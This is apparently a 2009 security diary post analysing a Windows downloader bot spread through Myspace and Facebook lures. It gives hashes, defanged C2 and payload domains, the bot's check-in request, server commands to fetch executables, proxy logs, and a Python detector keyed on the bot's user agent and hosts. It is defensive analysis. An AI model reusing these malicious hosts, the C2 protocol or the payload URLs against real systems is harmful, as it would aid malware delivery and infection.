Downloader reportedly from Myspace Profiles -- Updated
A friend sent me an email about some automatic malware downloads coming from myspace profiles.
She noted that the downloads appeared to be coming from "http://76[.]229[.]115[.]167/setup[.]exe"
I grabbed a couple of versions of the binary, 483a215a155a99f91cee79834493aadc and ec8dfdfebca19460d6b768b9040fb07b. Both were detected by Antivir as TR/Downloader.Gen.
I took a quick look at the file and some of the hardcoded domains include:
bombimbom20090809.com
glavnij20090809.com
piupiu-110809.com
web.reg.md
ya.ru
zz-dns.com
The bot is written to the Windows directory (%windir%) with the file name ld12.exe. ld12.exe is then added to the Run registry key so that it auto-starts if the system is rebooted.
piupiu-110809.com appears to be the botnet controller:
GET /ld/gen.php?f=0&a=1680587786&v=12&c=0&s=ld&l=1234&ck=0&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_fr=-2&c_yb=-2&c_tg=0&c_nl=0&c_fu=-2 HTTP/1.1
Host: piupiu-110809.com
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Content-type: application/x-www-form-urlencoded
Connection: close
The response back from the server looks like this:
a6
#PID=1000
STARTONCEIMG|http://web[.]reg[.]md/1/p.jpg|193854730d993dfgdfjkng345
STARTONCE|http://web[.]reg[.]md/1/prx.exe
START|http://web[.]reg[.]md/1/pp.11.exe
#BLACKLABEL
EXIT
0
(added []'s for safety)
This is the web activity:
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "POST http://piupiu-110809[.]com/achcheck.php HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://piupiu-110809[.]com/ld/gen.php?f=0&a=1680587786&v=12&c=0&s=ld&l=1234&ck=0&c_fb=0&c_ms=0&c_hi=0&c_tw=0&c_be=0&c_fr=-2&c_yb=-2&c_tg=0&c_nl=0&c_fu=-2 HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/p.jpg HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/prx.exe HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/pp.11.exe HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "POST http://221[.]5[.]74[.]46/p/in.php HTTP/1.0" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)"
Once the downloader grabs the new files, any sort of badness could happen.
Snort signatures that watch for the user agent string "MSIE 7.0; na;" will likely catch infected hosts.
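To show what such a rule keys on outside of Snort, here is an added example (not from the diary or any vendor) that parses proxy-log lines in the format above, refangs the "[.]" defanging, and flags a request either for the malformed "MSIE 7.0; na;" user agent or for one of the hosts the diary ties to this downloader. The three sample lines are constructed for the example; the host list is taken from the diary.

```python
import re
from collections import defaultdict
# Constructed sample lines in the diary's proxy-log format (defanged with [.]); not a live capture.
SAMPLE_LOG = """\
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "POST http://piupiu-110809[.]com/achcheck.php HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0; na; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
xx.xx.xx.102 - - [16/Aug/2009:20:17:31 -0600] "GET http://web[.]reg[.]md/1/prx.exe HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
xx.xx.xx.101 - - [16/Aug/2009:20:18:02 -0600] "GET http://www.example.com/index.html HTTP/1.1" - - "-" "Mozilla/5.0 (Windows NT 5.1; rv:3.5) Gecko/20090624 Firefox/3.5"
"""

# Hosts the diary ties to this downloader: controller, payload host, post-infection POST target.
C2_HOSTS = {"piupiu-110809.com", "web.reg.md", "221.5.74.46"}
# The bot's hardcoded UA carries "na" where a genuine IE 7 string puts "Windows NT x.y".
BOGUS_UA_TOKEN = "MSIE 7.0; na;"

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'\S+ \S+ "[^"]*" "(?P<ua>[^"]*)"')
HOST_RE = re.compile(r"^https?://([^/:]+)")

def parse_line(line):
    """Parse one log line into a dict, refanging '[.]' so hosts compare to real names."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["url"] = rec["url"].replace("[.]", ".")
    hm = HOST_RE.match(rec["url"])
    rec["host"] = hm.group(1) if hm else ""
    return rec

def classify(rec):
    """Return reasons this request matches the downloader's traffic pattern."""
    reasons = []
    if BOGUS_UA_TOKEN in rec["ua"]:
        reasons.append("bogus-ua")       # what the diary's Snort rule keys on
    if rec["host"] in C2_HOSTS:
        reasons.append("known-c2-host")  # second-stage fetch uses a normal-looking UA
    return reasons

def scan(log_text):
    """Group flagged requests by client IP: {ip: [(url, reasons), ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec:
            reasons = classify(rec)
            if reasons:
                hits[rec["ip"]].append((rec["url"], reasons))
    return dict(hits)
```

Note that the second-stage .exe fetches carry a normal-looking MSIE 6.0 user agent, so a rule on the user agent alone sees only the check-in; the host match catches the rest of the chain.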
Thanks to Alida for the heads up and binary.
Update:
Alida received a link to this binary via email. The link actually points to a poorly constructed Facebook image which suggests to the user they must download a plugin.
Another concern that several users are having is related to b.ashx from Myspace.
Safari and Firefox users who are receiving errors when downloading .ashx files: please contact your browser vendor.
ASHX files contain server-side scripts for handling dynamic content. These files are part of the MS ASP.NET web framework. You're likely getting download errors due to incorrect file associations. Alternatively, one could use IE. -- Did I just say that? :)
$ wget -qO /dev/stdout http://b.myspace.com/~myspace/beacon/b.ashx
<html> </html>
$
Labels: http botnet, Snort, Social Networking